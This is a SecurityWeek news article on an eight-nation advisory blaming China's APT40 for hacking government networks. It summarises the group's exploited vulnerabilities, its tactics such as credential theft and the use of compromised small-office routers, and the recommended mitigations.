Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Data Breaches

Global Coalition Blames China’s APT40 for Hacking Government Networks

Seven nations are backing Australia in calling out a China-linked hacking group for compromising government networks.

APT40 China Hacks

The US, UK, Canada, Germany, Japan, New Zealand, and South Korea are backing Australia in blaming Chinese state-sponsored threat actors for hacking into government networks.

Following the March 2024 sanctions against members of the Chinese advanced persistent threat (APT) actor APT31, the eight nations are now drawing attention to the tradecraft of APT40 – also known as Bronze Mohawk, Gingham Typhoon, Kryptonite Panda, and Leviathan.

“APT40 has repeatedly targeted Australian networks as well as government and private sector networks in the region, and the threat they pose to our networks is ongoing,” an advisory from government agencies in said countries reads.

Regularly conducting reconnaissance operations against networks in the authoring agencies’ countries, the hacking group identifies old, vulnerable devices to exploit.

APT40 has been observed quickly adopting exploits for new vulnerabilities, including bugs in widely used software such as Atlassian Confluence (CVE-2021-26084), Log4J (CVE-2021-44228), and Microsoft Exchange (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473).

According to the authoring agencies, the Chinese state-sponsored threat actor is expected “to continue using PoCs for new high-profile vulnerabilities within hours or days of public release”.

According to the advisory, APT40 prefers to exploit vulnerable, internet-facing infrastructure for initial access rather than using phishing or other techniques requiring user interaction. The malicious group has also been exfiltrating credentials for follow-up operations and establishing persistence early in the attack chain.

The hacking group was also seen compromising legacy small-office/home-office (SOHO) devices and relying on them as launching points for subsequent attacks that blend in with legitimate network traffic.

Advertisement. Scroll to continue reading.

“This technique is also regularly used by other PRC state-sponsored actors worldwide, and the authoring agencies consider this to be a shared threat,” the advisory reads.

As part of a targeted attack, the threat actor successfully maintained access to an Australian organization’s network between July and September 2022, established multiple access vectors to the network, exfiltrated large amounts of data, and moved laterally.

In another incident, the China-linked group compromised an organization’s remote access login portal that was likely vulnerable to a publicly disclosed remote code execution (RCE) flaw. The attackers exfiltrated “several hundred unique username and password pairs on the compromised appliance”.

To mitigate the risk of similar attacks, organizations are advised to implement comprehensive logging capabilities, promptly patch all internet-accessible appliances, implement network segmentation, disable unused services, ports, and protocols, implement multi-factor authentication, and to replace legacy equipment.

All organizations and software manufacturers are advised “to review the advisory to help identify, prevent, and remediate APT 40 intrusions. Software vendors are also urged to incorporate Secure by Design principles into their practices to limit the impact of threat actor techniques and to strengthen the security posture of their products for their customers,” the US cybersecurity agency CISA notes.

Related: Cisco Patches NX-OS Zero-Day Exploited by Chinese Cyberspies

Related: 22 Chinese Nationals Sentenced to Long Prison Terms in Zambia for Multinational Cybercrimes

Related: Chinese Hackers Target Energy Firms in South China Sea

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Learn how to utilize tools, controls, and design models needed to properly secure cloud environments.

Register

Event: ICS Cybersecurity Conference

The leading industrial cybersecurity conference for Operations, Control Systems and IT/OT Security professionals to connect on SCADA, DCS PLC and field controller cybersecurity.

Register

People on the Move

SaaS security company AppOmni has hired Joel Wallenstrom as its General Manager.

FTI Consulting has appointed Brett Callow as Managing Director in its Cybersecurity & Data Privacy Communications practice.

Mobile security firm Zimperium has welcomed David Natker as its VP of Global Partners and Alliances.

More People On The Move

Expert Insights